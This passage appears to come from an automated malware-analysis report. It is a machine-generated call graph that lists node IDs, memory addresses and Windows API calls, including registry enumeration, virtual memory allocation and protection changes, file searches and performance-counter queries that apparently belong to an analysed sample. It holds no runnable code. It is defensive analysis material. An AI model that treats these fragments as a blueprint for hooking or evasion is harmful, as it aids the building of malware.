RegCloseKey 15032->15033 15034 2527dee1323 GetProcessHeap HeapAlloc 15032->15034 15033->14975 15035 2527dee134e RegEnumValueW 15034->15035 15036 2527dee1472 GetProcessHeap HeapFree 15034->15036 15037 2527dee13a1 15035->15037 15036->15033 15037->15035 15037->15036 15039 2527dee13cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15037->15039 15040 2527dee141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 15037->15040 15046 2527dee1530 15037->15046 15039->15040 15040->15037 15042 2527dee10bf 15041->15042 15043 2527dee11b5 RegCloseKey 15041->15043 15042->15043 15044 2527dee10cf RegEnumValueW 15042->15044 15045 2527dee114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15042->15045 15043->14979 15044->15042 15045->15042 15047 2527dee154a 15046->15047 15050 2527dee1580 15046->15050 15048 2527dee1561 StrCmpIW 15047->15048 15049 2527dee1569 StrCmpW 15047->15049 15047->15050 15048->15047 15049->15047 15050->15037 15052 2527dee14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15051->15052 15053 2527dee14c2 GetProcessHeap HeapFree 15051->15053 15053->15052 15053->15053 16028 2527df181c0 16029 2527df181c9 __scrt_release_startup_lock 16028->16029 16031 2527df181cd 16029->16031 16032 2527df1bbb4 16029->16032 16033 2527df1bbd4 16032->16033 16060 2527df1bbed 16032->16060 16034 2527df1bbf2 16033->16034 16035 2527df1bbdc 16033->16035 16037 2527df1e864 56 API calls 16034->16037 16036 2527df1d1f4 __std_exception_copy 13 API calls 16035->16036 16038 2527df1bbe1 16036->16038 16039 2527df1bbf7 16037->16039 16061 2527df1d04c 16038->16061 16064 2527df1df38 GetModuleFileNameW 16039->16064 16047 2527df1bc69 16049 2527df1d1f4 __std_exception_copy 13 API calls 16047->16049 16048 2527df1bc7a 16050 2527df1b994 14 API calls 16048->16050 16051 2527df1bc6e 16049->16051 16053 2527df1bc96 16050->16053 16052 2527df1d2a0 __free_lconv_num 13 API calls 16051->16052 16052->16060 16053->16051 16054 2527df1bcc6 16053->16054 16055 2527df1bcdf 16053->16055 16056 2527df1d2a0 __free_lconv_num 13 API calls 16054->16056 16055->16055 16057 2527df1d2a0 __free_lconv_num 13 API calls 16055->16057 16058 2527df1bccf 16056->16058 16057->16051 16059 2527df1d2a0 __free_lconv_num 13 API calls 16058->16059 16059->16060 16060->16031 16088 2527df1cef8 16061->16088 16065 2527df1df7d GetLastError 16064->16065 16066 2527df1df91 16064->16066 16153 2527df1d184 16065->16153 16067 2527df1dd78 14 API calls 16066->16067 16069 2527df1dfbf 16067->16069 16074 2527df1dfd0 16069->16074 16158 2527df1f198 16069->16158 16070 2527df1df8a 16071 2527df18070 _invalid_parameter_noinfo 8 API calls 16070->16071 16073 2527df1bc0e 16071->16073 16076 2527df1b994 16073->16076 16162 2527df1de1c 16074->16162 16078 2527df1b9d2 16076->16078 16080 2527df1ba38 16078->16080 16179 2527df1ec1c 16078->16179 16079 2527df1bb25 16082 2527df1bb54 16079->16082 16080->16079 16081 2527df1ec1c 14 API calls 16080->16081 16081->16080 16083 2527df1bba4 16082->16083 16084 2527df1bb6c 16082->16084 16083->16047 16083->16048 16084->16083 16085 2527df1d220 __std_exception_copy 13 API calls 16084->16085 16086 2527df1bb9a 16085->16086 16087 2527df1d2a0 __free_lconv_num 13 API calls 16086->16087 16087->16083 16089 2527df1cf23 16088->16089 16096 2527df1cf94 16089->16096 16091 2527df1cf4a 16093 2527df1cf6d 16091->16093 16106 2527df1c3e0 16091->16106 16094 2527df1c3e0 _invalid_parameter_noinfo 17 API calls 16093->16094 16095 2527df1cf82 16093->16095 16094->16095 16095->16060 16119 2527df1ccc8 16096->16119 16102 2527df1cfcf 16102->16091 16107 2527df1c438 16106->16107 16108 2527df1c3ef GetLastError 16106->16108 16107->16093 16109 2527df1c404 16108->16109 16110 2527df1cba0 _invalid_parameter_noinfo 14 API calls 16109->16110 16111 2527df1c41e SetLastError 16110->16111 16111->16107 16112 2527df1c441 16111->16112 16113 2527df1c3e0 _invalid_parameter_noinfo 15 API calls 16112->16113 16114 2527df1c467 16113->16114 16145 2527df1ffe8 16114->16145 16120 2527df1cce4 GetLastError 16119->16120 16121 2527df1cd1f 16119->16121 16122 2527df1ccf4 16120->16122 16121->16102 16125 2527df1cd34 16121->16125 16132 2527df1cba0 16122->16132 16126 2527df1cd68 16125->16126 16127 2527df1cd50 GetLastError SetLastError 16125->16127 16126->16102 16128 2527df1d06c IsProcessorFeaturePresent 16126->16128 16127->16126 16129 2527df1d07f 16128->16129 16137 2527df1cd80 16129->16137 16133 2527df1cbc8 FlsGetValue 16132->16133 16135 2527df1cbc4 16132->16135 16133->16135 16134 2527df1cbde SetLastError 16134->16121 16135->16134 16136 2527df1c940 __std_exception_copy 13 API calls 16135->16136 16136->16134 16138 2527df1cdba _invalid_parameter_noinfo 16137->16138 16139 2527df1cde2 RtlCaptureContext RtlLookupFunctionEntry 16138->16139 16140 2527df1ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16139->16140 16141 2527df1ce2e RtlVirtualUnwind 16139->16141 16142 2527df1ceb6 _invalid_parameter_noinfo 16140->16142 16141->16140 16143 2527df18070 _invalid_parameter_noinfo 8 API calls 16142->16143 16144 2527df1ced5 GetCurrentProcess TerminateProcess 16143->16144 16146 2527df1c48f 16145->16146 16147 2527df20001 16145->16147 16149 2527df20054 16146->16149 16147->16146 16148 2527df20a40 _invalid_parameter_noinfo 14 API calls 16147->16148 16148->16146 16150 2527df1c49f 16149->16150 16151 2527df2006d 16149->16151 16150->16093 16151->16150 16152 2527df1e8c4 _invalid_parameter_noinfo 14 API calls 16151->16152 16152->16150 16176 2527df1d1d0 16153->16176 16155 2527df1d191 __free_lconv_num 16156 2527df1d1f4 __std_exception_copy 13 API calls 16155->16156 16157 2527df1d1a1 16156->16157 16157->16070 16159 2527df1f1a9 16158->16159 16160 2527df1f1ca 16158->16160 16159->16160 16161 2527df1ef88 9 API calls 16159->16161 16160->16074 16161->16160 16163 2527df1de5b 16162->16163 16165 2527df1de40 16162->16165 16164 2527df1ece8 WideCharToMultiByte 16163->16164 16171 2527df1de60 16163->16171 16166 2527df1deb7 16164->16166 16165->16070 16167 2527df1debe GetLastError 16166->16167 16170 2527df1dee9 16166->16170 16166->16171 16169 2527df1d184 13 API calls 16167->16169 16168 2527df1d1f4 __std_exception_copy 13 API calls 16168->16165 16172 2527df1decb 16169->16172 16173 2527df1ece8 WideCharToMultiByte 16170->16173 16171->16165 16171->16168 16174 2527df1d1f4 __std_exception_copy 13 API calls 16172->16174 16175 2527df1df10 16173->16175 16174->16165 16175->16165 16175->16167 16177 2527df1cb10 __std_exception_copy 13 API calls 16176->16177 16178 2527df1d1d9 16177->16178 16178->16155 16180 2527df1eba8 16179->16180 16181 2527df1dd78 14 API calls 16180->16181 16182 2527df1ebcc 16181->16182 16182->16078 17396 2527def47c2 17397 2527dee9978 __CxxCallCatchBlock 9 API calls 17396->17397 17400 2527def47d5 17397->17400 17398 2527dee9324 __CxxCallCatchBlock 9 API calls 17399 2527def4828 17398->17399 17401 2527dee9324 __CxxCallCatchBlock 9 API calls 17399->17401 17403 2527dee8ff8 __CxxCallCatchBlock 9 API calls 17400->17403 17404 2527def4814 __CxxCallCatchBlock 17400->17404 17402 2527def4838 17401->17402 17403->17404 17404->17398 14934 2527deef6a0 14945 2527deec558 EnterCriticalSection 14934->14945 14936 2527deef6b0 14937 2527def1c5c 39 API calls 14936->14937 14938 2527deef6b9 14937->14938 14939 2527deef6c7 14938->14939 14941 2527deef498 41 API calls 14938->14941 14940 2527deec5ac Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 14939->14940 14942 2527deef6d3 14940->14942 14943 2527deef6c2 14941->14943 14944 2527deef598 GetStdHandle GetFileType 14943->14944 14944->14939 17405 2527def479d 17408 2527deeaf34 17405->17408 17409 2527deeaf4e 17408->17409 17411 2527deeaf9b 17408->17411 17410 2527dee9324 __CxxCallCatchBlock 9 API calls 17409->17410 17409->17411 17410->17411 17425 2527def1398 17426 2527def13ae 17425->17426 17427 2527def13f5 17426->17427 17429 2527def140e 17426->17429 17428 2527deed1f4 __free_lconv_mon 13 API calls 17427->17428 17430 2527def13fa 17428->17430 17431 2527deedd78 14 API calls 17429->17431 17433 2527def1405 17429->17433 17432 2527deed04c _invalid_parameter_noinfo 38 API calls 17430->17432 17431->17433 17432->17433 17943 2527deeaaac 17944 2527deeaad9 __except_validate_context_record 17943->17944 17945 2527dee9324 __CxxCallCatchBlock 9 API calls 17944->17945 17946 2527deeaade 17945->17946 17948 2527deeab38 17946->17948 17951 2527deeabc6 17946->17951 17957 2527deeab8c 17946->17957 17947 2527deeac34 17947->17957 17985 2527deea22c 17947->17985 17949 2527deeabb3 17948->17949 17948->17957 17958 2527deeab5a __GetCurrentState 17948->17958 17972 2527dee95d0 17949->17972 17954 2527deeabe5 17951->17954 17979 2527dee99cc 17951->17979 17954->17947 17954->17957 17982 2527dee99e0 17954->17982 17955 2527deeacdd 17958->17955 17960 2527deeafb8 17958->17960 17961 2527dee99cc Is_bad_exception_allowed 9 API calls 17960->17961 17962 2527deeafe7 __GetCurrentState 17961->17962 17963 2527dee9324 __CxxCallCatchBlock 9 API calls 17962->17963 17970 2527deeb004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 17963->17970 17964 2527deeb0fb 17965 2527dee9324 __CxxCallCatchBlock 9 API calls 17964->17965 17966 2527deeb100 17965->17966 17967 2527dee9324 __CxxCallCatchBlock 9 API calls 17966->17967 17968 2527deeb10b __FrameHandler3::GetHandlerSearchState 17966->17968 17967->17968 17968->17957 17969 2527dee99cc 9 API calls Is_bad_exception_allowed 17969->17970 17970->17964 17970->17968 17970->17969 17971 2527dee99f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17970->17971 17971->17970 18042 2527dee9634 17972->18042 17974 2527dee95ef __FrameHandler3::ExecutionInCatch 18046 2527dee9540 17974->18046 17977 2527deeafb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17978 2527dee9624 17977->17978 17978->17957 17980 2527dee9324 __CxxCallCatchBlock 9 API calls 17979->17980 17981 2527dee99d5 17980->17981 17981->17954 17983 2527dee9324 __CxxCallCatchBlock 9 API calls 17982->17983 17984 2527dee99e9 17983->17984 17984->17947 18050 2527deeb144 17985->18050 17987 2527deea6f4 17988 2527deea373 17989 2527deea645 17988->17989 18033 2527deea3ab 17988->18033 17989->17987 17990 2527deea643 17989->17990 18103 2527deea6fc 17989->18103 17992 2527dee9324 __CxxCallCatchBlock 9 API calls 17990->17992 17996 2527deea687 17992->17996 17993 2527deea575 17993->17990 17999 2527deea592 17993->17999 18002 2527dee99cc Is_bad_exception_allowed 9 API calls 17993->18002 17994 2527dee9324 __CxxCallCatchBlock 9 API calls 17997 2527deea2da 17994->17997 17996->17987 17998 2527dee8070 _invalid_parameter_noinfo 8 API calls 17996->17998 17997->17996 18000 2527dee9324 __CxxCallCatchBlock 9 API calls 17997->18000 18001 2527deea69a 17998->18001 17999->17990 18005 2527deea5b4 17999->18005 18096 2527dee95a4 17999->18096 18004 2527deea2ea 18000->18004 18001->17957 18002->17999 18006 2527dee9324 __CxxCallCatchBlock 9 API calls 18004->18006 18005->17990 18007 2527deea5ca 18005->18007 18008 2527deea6d7 18005->18008 18009 2527deea2f3 18006->18009 18010 2527deea5d5 18007->18010 18013 2527dee99cc Is_bad_exception_allowed 9 API calls 18007->18013 18011 2527dee9324 __CxxCallCatchBlock 9 API calls 18008->18011 18061 2527dee9a0c 18009->18061 18017 2527deeb1dc 9 API calls 18010->18017 18014 2527deea6dd 18011->18014 18013->18010 18016 2527dee9324 __CxxCallCatchBlock 9 API calls 18014->18016 18018 2527deea6e6 18016->18018 18019 2527deea5eb 18017->18019 18021 2527deec2f4 14 API calls 18018->18021 18019->17990 18023 2527dee9634 __GetUnwindTryBlock RtlLookupFunctionEntry 18019->18023 18020 2527dee9324 __CxxCallCatchBlock 9 API calls 18022 2527deea335 18020->18022 18021->17987 18022->17988 18025 2527dee9324 __CxxCallCatchBlock 9 API calls 18022->18025 18024 2527deea605 18023->18024 18100 2527dee9838 RtlUnwindEx 18024->18100 18027 2527deea341 18025->18027 18029 2527dee9324 __CxxCallCatchBlock 9 API calls 18027->18029 18028 2527dee99e0 9 API calls 18028->18033 18030 2527deea34a 18029->18030 18064 2527deeb1dc 18030->18064 18033->17993 18033->18028 18075 2527deea96c 18033->18075 18089 2527deea158 18033->18089 18036 2527deea35e 18071 2527deeb2cc 18036->18071 18038 2527deea6d1 18039 2527deec2f4 14 API calls 18038->18039 18039->18008 18040 2527deea366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 18040->18038 18041 2527dee9178 Concurrency::cancel_current_task 2 API calls 18040->18041 18041->18038 18043 2527dee9662 __FrameHandler3::ExecutionInCatch 18042->18043 18044 2527dee968c RtlLookupFunctionEntry 18043->18044 18045 2527dee96d4 18043->18045 18044->18043 18045->17974 18047 2527dee958b 18046->18047 18049 2527dee9560 18046->18049 18047->17977 18048 2527dee9324 __CxxCallCatchBlock 9 API calls 18048->18049 18049->18047 18049->18048 18051 2527deeb169 __FrameHandler3::ExecutionInCatch 18050->18051 18052 2527dee9634 __GetUnwindTryBlock RtlLookupFunctionEntry 18051->18052 18053 2527deeb17e 18052->18053 18115 2527dee9db4 18053->18115 18056 2527deeb190 __FrameHandler3::GetHandlerSearchState 18118 2527dee9dec 18056->18118 18057 2527deeb1b3 18058 2527dee9db4 __GetUnwindTryBlock RtlLookupFunctionEntry 18057->18058 18059 2527deea28e 18058->18059 18059->17987 18059->17988 18059->17994 18062 2527dee9324 __CxxCallCatchBlock 9 API calls 18061->18062 18063 2527dee9a1a 18062->18063 18063->17987 18063->18020 18065 2527deeb2c3 18064->18065 18070 2527deeb207 18064->18070 18066 2527deea35a 18066->17988 18066->18036 18067 2527dee99e0 9 API calls 18067->18070 18068 2527dee99cc Is_bad_exception_allowed 9 API calls 18068->18070 18069 2527deea96c 9 API calls 18069->18070 18070->18066 18070->18067 18070->18068 18070->18069 18072 2527deeb2e9 Is_bad_exception_allowed 18071->18072 18074 2527deeb339 18071->18074 18073 2527dee99cc 9 API calls Is_bad_exception_allowed 18072->18073 18072->18074 18073->18072 18074->18040 18076 2527deea999 18075->18076 18088 2527deeaa28 18075->18088 18077 2527dee99cc Is_bad_exception_allowed 9 API calls 18076->18077 18078 2527deea9a2 18077->18078 18079 2527dee99cc Is_bad_exception_allowed 9 API calls 18078->18079 18080 2527deea9bb 18078->18080 18078->18088 18079->18080 18081 2527deea9e7 18080->18081 18082 2527dee99cc Is_bad_exception_allowed 9 API calls 18080->18082 18080->18088 18083 2527dee99e0 9 API calls 18081->18083 18082->18081 18084 2527deea9fb 18083->18084 18085 2527deeaa14 18084->18085 18086 2527dee99cc Is_bad_exception_allowed 9 API calls 18084->18086 18084->18088 18087 2527dee99e0 9 API calls 18085->18087 18086->18085 18087->18088 18088->18033 18090 2527dee9634 __GetUnwindTryBlock RtlLookupFunctionEntry 18089->18090 18091 2527deea195 18090->18091 18092 2527dee99cc Is_bad_exception_allowed 9 API calls 18091->18092 18093 2527deea1cd 18092->18093 18094 2527dee9838 9 API calls 18093->18094 18095 2527deea211 18094->18095 18095->18033 18097 2527dee95b8 __FrameHandler3::ExecutionInCatch 18096->18097 18098 2527dee9540 __FrameHandler3::ExecutionInCatch 9 API calls 18097->18098 18099 2527dee95c2 18098->18099 18099->18005 18101 2527dee8070 _invalid_parameter_noinfo 8 API calls 18100->18101 18102 2527dee9932 18101->18102 18102->17990 18104 2527deea735 18103->18104 18108 2527deea948 18103->18108 18105 2527dee9324 __CxxCallCatchBlock 9 API calls 18104->18105 18106 2527deea73a 18105->18106 18107 2527deea759 EncodePointer 18106->18107 18113 2527deea7ac 18106->18113 18109 2527dee9324 __CxxCallCatchBlock 9 API calls 18107->18109 18108->17990 18110 2527deea769 18109->18110 18110->18113 18121 2527dee94ec 18110->18121 18112 2527deea158 19 API calls 18112->18113 18113->18108 18113->18112 18114 2527dee99cc 9 API calls Is_bad_exception_allowed 18113->18114 18114->18113 18116 2527dee9634 __GetUnwindTryBlock RtlLookupFunctionEntry 18115->18116 18117 2527dee9dc7 18116->18117 18117->18056 18117->18057 18119 2527dee9634 __GetUnwindTryBlock RtlLookupFunctionEntry 18118->18119 18120 2527dee9e06 18119->18120 18120->18059 18122 2527dee9324 __CxxCallCatchBlock 9 API calls 18121->18122 18123 2527dee9518 18122->18123 18123->18113 17443 2527dee33a8 17444 2527dee33cf 17443->17444 17445 2527dee349c 17444->17445 17446 2527dee33ec PdhGetCounterInfoW 17444->17446 17446->17445 17447 2527dee340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 17446->17447 17448 2527dee3440 StrCmpW 17447->17448 17449 2527dee3488 GetProcessHeap HeapFree 17447->17449 17448->17449 17450 2527dee3455 17448->17450 17449->17445 17450->17449 17451 2527dee3950 12 API calls 17450->17451 17451->17450 17452 2527def0fa8 17453 2527def0fcc 17452->17453 17454 2527dee8070 _invalid_parameter_noinfo 8 API calls 17453->17454 17455 2527def100e 17454->17455 16183 2527deec180 16186 2527deebf38 16183->16186 16193 2527deebf00 16186->16193 16194 2527deebf10 16193->16194 16195 2527deebf15 16193->16195 16196 2527deebebc 13 API calls 16194->16196 16197 2527deebf1c 16195->16197 16196->16195 16198 2527deebf31 16197->16198 16199 2527deebf2c 16197->16199 16201 2527deebebc 16198->16201 16200 2527deebebc 13 API calls 16199->16200 16200->16198 16202 2527deebec1 16201->16202 16203 2527deebef2 16201->16203 16204 2527deebeea 16202->16204 16206 2527deed2a0 __free_lconv_mon 13 API calls 16202->16206 16205 2527deed2a0 __free_lconv_mon 13 API calls 16204->16205 16205->16203 16206->16202 16775 2527def387c 16776 2527def38b4 __GSHandlerCheckCommon 16775->16776 16777 2527def38e0 16776->16777 16779 2527dee9a24 16776->16779 16780 2527dee9324 __CxxCallCatchBlock 9 API calls 16779->16780 16781 2527dee9a4e 16780->16781 16782 2527dee9324 __CxxCallCatchBlock 9 API calls 16781->16782 16783 2527dee9a5b 16782->16783 16784 2527dee9324 __CxxCallCatchBlock 9 API calls 16783->16784 16785 2527dee9a64 16784->16785 16785->16777 16207 2527dee5974 16208 2527dee597a 16207->16208 16219 2527dee7fa0 16208->16219 16212 2527dee59de 16214 2527dee5a77 16214->16212 16216 2527dee5bfd 16214->16216 16232 2527dee7b80 16214->16232 16215 2527dee5cfb 16216->16215 16217 2527dee5d77 VirtualProtect 16216->16217 16217->16212 16218 2527dee5da3 GetLastError 16217->16218 16218->16212 16220 2527dee7fab 16219->16220 16221 2527dee59bd 16220->16221 16222 2527deeb470 __free_lconv_mon 2 API calls 16220->16222 16223 2527dee7fca 16220->16223 16221->16212 16228 2527dee4400 16221->16228 16222->16220 16224 2527dee7fd5 16223->16224 16238 2527dee87b8 16223->16238 16242 2527dee87d8 16224->16242 16229 2527dee441d 16228->16229 16231 2527dee448c 16229->16231 16251 2527dee4670 16229->16251 16231->16214 16233 2527dee7bc7 16232->16233 16276 2527dee7950 16233->16276 16236 2527dee8070 _invalid_parameter_noinfo 8 API calls 16237 2527dee7bf1 16236->16237 16237->16214 16239 2527dee87c6 std::bad_alloc::bad_alloc 16238->16239 16246 2527dee9178 16239->16246 16241 2527dee87d7 16243 2527dee87e6 std::bad_alloc::bad_alloc 16242->16243 16244 2527dee9178 Concurrency::cancel_current_task 2 API calls 16243->16244 16245 2527dee7fdb 16244->16245 16247 2527dee9197 16246->16247 16248 2527dee91c0 RtlPcToFileHeader 16247->16248 16249 2527dee91e2 RaiseException 16247->16249 16250 2527dee91d8 16248->16250 16249->16241 16250->16249 16252 2527dee46b7 16251->16252 16253 2527dee4694 16251->16253 16256 2527dee46ed 16252->16256 16271 2527dee4250 16252->16271 16253->16252 16265 2527dee4120 16253->16265 16259 2527dee4250 2 API calls 16256->16259 16263 2527dee471d 16256->16263 16257 2527dee4753 16258 2527dee476f 16257->16258 16261 2527dee4120 3 API calls 16257->16261 16262 2527dee478b 16258->16262 16264 2527dee4250 2 API calls 16258->16264 16259->16263 16260 2527dee4120 3 API calls 16260->16257 16261->16258 16262->16231 16263->16257 16263->16260 16264->16262 16270 2527dee4141 16265->16270 16266 2527dee41b0 16266->16252 16267 2527dee4196 VirtualQuery 16267->16266 16267->16270 16268 2527dee41ca VirtualAlloc 16268->16266 16269 2527dee41fb GetLastError 16268->16269 16269->16270 16270->16266 16270->16267 16270->16268 16274 2527dee4268 16271->16274 16272 2527dee42bd VirtualQuery 16273 2527dee42d7 16272->16273 16272->16274 16273->16256 16274->16272 16274->16273 16275 2527dee4322 GetLastError 16274->16275 16275->16274 16277 2527dee796b 16276->16277 16278 2527dee7981 SetLastError 16277->16278 16279 2527dee798f 16277->16279 16278->16279 16279->16236 18135 2527dee8672 18136 2527dee90c0 __std_exception_copy 38 API calls 18135->18136 18137 2527dee869d 18136->18137 16792 2527dee5c8d 16794 2527dee5c94 16792->16794 16793 2527dee5cfb 16794->16793 16795 2527dee5d77 VirtualProtect 16794->16795 16796 2527dee5db1 16795->16796 16797 2527dee5da3 GetLastError 16795->16797 16797->16796 17463 2527dee7f60 17464 2527dee7f81 17463->17464 17465 2527dee7f7c 17463->17465 17467 2527dee8090 17465->17467 17468 2527dee8127 17467->17468 17469 2527dee80b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 17467->17469 17468->17464 17469->17468 16377 2527def3960 16387 2527dee8ca0 16377->16387 16379 2527def3988 16382 2527def3998 16383 2527dee9324 __CxxCallCatchBlock 9 API calls 16382->16383 16384 2527def39a1 16383->16384 16394 2527deec2f4 16384->16394 16388 2527dee8cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 16387->16388 16389 2527dee8dd1 16388->16389 16390 2527dee8d94 RtlUnwindEx 16388->16390 16389->16379 16391 2527dee9324 16389->16391 16390->16388 16392 2527dee9340 __CxxCallCatchBlock 9 API calls 16391->16392 16393 2527dee932d 16392->16393 16393->16382 16395 2527deecab0 _invalid_parameter_noinfo 14 API calls 16394->16395 16396 2527deec2fd 16395->16396 18141 2527def465f 18142 2527def4677 18141->18142 18148 2527def46e2 18141->18148 18143 2527dee9324 __CxxCallCatchBlock 9 API calls 18142->18143 18142->18148 18144 2527def46c4 18143->18144 18145 2527dee9324 __CxxCallCatchBlock 9 API calls 18144->18145 18146 2527def46d9 18145->18146 18147 2527deec2f4 14 API calls 18146->18147 18147->18148 16817 2527def485e 16818 2527dee9324 __CxxCallCatchBlock 9 API calls 16817->16818 16819 2527def486c 16818->16819 16820 2527dee9324 __CxxCallCatchBlock 9 API calls 16819->16820 16821 2527def4877 16819->16821 16820->16821 18149 2527deed658 18150 2527deed67d 18149->18150 18155 2527deed694 18149->18155 18151 2527deed1f4 __free_lconv_mon 13 API calls 18150->18151 18152 2527deed682 18151->18152 18154 2527deed04c _invalid_parameter_noinfo 38 API calls 18152->18154 18153 2527deed724 18156 2527deebb54 13 API calls 18153->18156 18176 2527deed68d 18154->18176 18155->18153 18164 2527deed7b6 18155->18164 18166 2527deed6da 18155->18166 18182 2527deed894 18155->18182 18244 2527deeda18 18155->18244 18157 2527deed77c 18156->18157 18160 2527deed784 18157->18160 18169 2527deed7d7 18157->18169 18162 2527deed2a0 __free_lconv_mon 13 API calls 18160->18162 18161 2527deed836 18165 2527deed2a0 __free_lconv_mon 13 API calls 18161->18165 18163 2527deed78b 18162->18163 18167 2527deed6fd 18163->18167 18170 2527deed2a0 __free_lconv_mon 13 API calls 18163->18170 18164->18167 18173 2527deed2a0 __free_lconv_mon 13 API calls 18164->18173 18168 2527deed841 18165->18168 18166->18167 18174 2527deed2a0 __free_lconv_mon 13 API calls 18166->18174 18171 2527deed2a0 __free_lconv_mon 13 API calls 18167->18171 18172 2527deed85a 18168->18172 18177 2527deed2a0 __free_lconv_mon 13 API calls 18168->18177 18169->18161 18179 2527deed87c 18169->18179 18281 2527def0eb8 18169->18281 18170->18163 18171->18176 18178 2527deed2a0 __free_lconv_mon 13 API calls 18172->18178 18173->18164 18174->18166 18177->18168 18178->18176 18180 2527deed06c _invalid_parameter_noinfo 17 API calls 18179->18180 18181 2527deed891 18180->18181 18183 2527deed8c2 18182->18183 18183->18183 18184 2527deed8de 18183->18184 18185 2527deed220 __free_lconv_mon 13 API calls 18183->18185 18184->18155 18186 2527deed90d 18185->18186 18187 2527deed926 18186->18187 18188 2527def0eb8 38 API calls 18186->18188 18189 2527def0eb8 38 API calls 18187->18189 18191 2527deed9fc 18187->18191 18188->18187 18190 2527deed943 18189->18190 18190->18191 18192 2527deed97f 18190->18192 18194 2527deed98d 18190->18194 18195 2527deed962 18190->18195 18193 2527deed06c _invalid_parameter_noinfo 17 API calls 18191->18193 18197 2527deed2a0 __free_lconv_mon 13 API calls 18192->18197 18205 2527deeda17 18193->18205 18198 2527deed977 18194->18198 18290 2527deeeee0 18194->18290 18196 2527deed220 __free_lconv_mon 13 API calls 18195->18196 18200 2527deed96d 18196->18200 18197->18191 18198->18192 18199 2527deed2a0 __free_lconv_mon 13 API calls 18198->18199 18199->18192 18203 2527deed2a0 __free_lconv_mon 13 API calls 18200->18203 18202 2527deeda7a 18207 2527deeda8c 18202->18207 18213 2527deedaa1 18202->18213 18203->18198 18204 2527deed9b5 18208 2527deed9d0 18204->18208 18209 2527deed9ba 18204->18209 18205->18202 18299 2527def13d8 18205->18299 18211 2527deed894 52 API calls 18207->18211 18210 2527deed2a0 __free_lconv_mon 13 API calls 18208->18210 18212 2527deed2a0 __free_lconv_mon 13 API calls 18209->18212 18210->18192 18239 2527deeda9c 18211->18239 18212->18198 18215 2527deedd78 14 API calls 18213->18215 18214 2527dee8070 _invalid_parameter_noinfo 8 API calls 18216 2527deedd64 18214->18216 18217 2527deedb0b 18215->18217 18216->18155 18218 2527deedb1a 18217->18218 18219 2527deef198 9 API calls 18217->18219 18308 2527deed30c 18218->18308 18219->18218 18222 2527deedba8 18223 2527deed894 52 API calls 18222->18223 18224 2527deedbb8 18223->18224 18227 2527deed2a0 __free_lconv_mon 13 API calls 18224->18227 18224->18239 18225 2527deedd78 14 API calls 18226 2527deedbd2 18225->18226 18226->18225 18228 2527deef198 9 API calls 18226->18228 18230 2527deed894 52 API calls 18226->18230 18231 2527deedcc8 FindNextFileW 18226->18231 18232 2527deed2a0 13 API calls __free_lconv_mon 18226->18232 18233 2527deedd2a 18226->18233 18330 2527deed4ac 18226->18330 18227->18239 18228->18226 18230->18226 18231->18226 18234 2527deedce0 18231->18234 18232->18226 18235 2527deedd38 FindClose 18233->18235 18240 2527deed2a0 __free_lconv_mon 13 API calls 18233->18240 18236 2527deedd0c FindClose 18234->18236 18352 2527def0b20 18234->18352 18235->18239 18241 2527deedd48 18235->18241 18238 2527deedd1c 18236->18238 18236->18239 18242 2527deed2a0 __free_lconv_mon 13 API calls 18238->18242 18239->18214 18240->18235 18243 2527deed2a0 __free_lconv_mon 13 API calls 18241->18243 18242->18239 18243->18239 18245 2527deeda7a 18244->18245 18246 2527deeda58 18244->18246 18248 2527deeda8c 18245->18248 18250 2527deedaa1 18245->18250 18246->18245 18247 2527def13d8 38 API calls 18246->18247 18247->18246 18249 2527deed894 56 API calls 18248->18249 18276 2527deeda9c 18249->18276 18252 2527deedd78 14 API calls 18250->18252 18251 2527dee8070 _invalid_parameter_noinfo 8 API calls 18253 2527deedd64 18251->18253 18254 2527deedb0b 18252->18254 18253->18155 18255 2527deedb1a 18254->18255 18256 2527deef198 9 API calls 18254->18256 18257 2527deed30c 16 API calls 18255->18257 18256->18255 18258 2527deedb7b FindFirstFileExW 18257->18258 18259 2527deedba8 18258->18259 18265 2527deedbd2 18258->18265 18260 2527deed894 56 API calls 18259->18260 18261 2527deedbb8 18260->18261 18263 2527deed2a0 __free_lconv_mon 13 API calls 18261->18263 18261->18276 18262 2527deedd78 14 API calls 18262->18265 18263->18276 18264 2527deef198 9 API calls 18264->18265 18265->18262 18265->18264 18266 2527deed4ac 16 API calls 18265->18266 18267 2527deed894 56 API calls 18265->18267 18268 2527deedcc8 FindNextFileW 18265->18268 18269 2527deed2a0 13 API calls __free_lconv_mon 18265->18269 18270 2527deedd2a 18265->18270 18266->18265 18267->18265 18268->18265 18273 2527deedce0 18268->18273 18269->18265 18271 2527deedd38 FindClose 18270->18271 18277 2527deed2a0 __free_lconv_mon 13 API calls 18270->18277 18271->18276 18278 2527deedd48 18271->18278 18272 2527deedd0c FindClose 18275 2527deedd1c 18272->18275 18272->18276 18273->18272 18274 2527def0b20 38 API calls 18273->18274 18274->18272 18279 2527deed2a0 __free_lconv_mon 13 API calls 18275->18279 18276->18251 18277->18271 18280 2527deed2a0 __free_lconv_mon 13 API calls 18278->18280 18279->18276 18280->18276 18285 2527def0ed5 18281->18285 18282 2527def0eda 18283 2527def0ef0 18282->18283 18284 2527deed1f4 __free_lconv_mon 13 API calls 18282->18284 18283->18169 18286 2527def0ee4 18284->18286 18285->18282 18285->18283 18288 2527def0f24 18285->18288 18287 2527deed04c _invalid_parameter_noinfo 38 API calls 18286->18287 18287->18283 18288->18283 18289 2527deed1f4 __free_lconv_mon 13 API calls 18288->18289 18289->18286 18291 2527deeef1f 18290->18291 18292 2527deeef02 18290->18292 18294 2527deeef29 18291->18294 18360 2527def19f0 18291->18360 18292->18291 18293 2527deeef10 18292->18293 18295 2527deed1f4 __free_lconv_mon 13 API calls 18293->18295 18367 2527def1a40 18294->18367 18298 2527deeef15 18295->18298 18298->18204 18300 2527def13e0 18299->18300 18301 2527def13f5 18300->18301 18303 2527def140e 18300->18303 18302 2527deed1f4 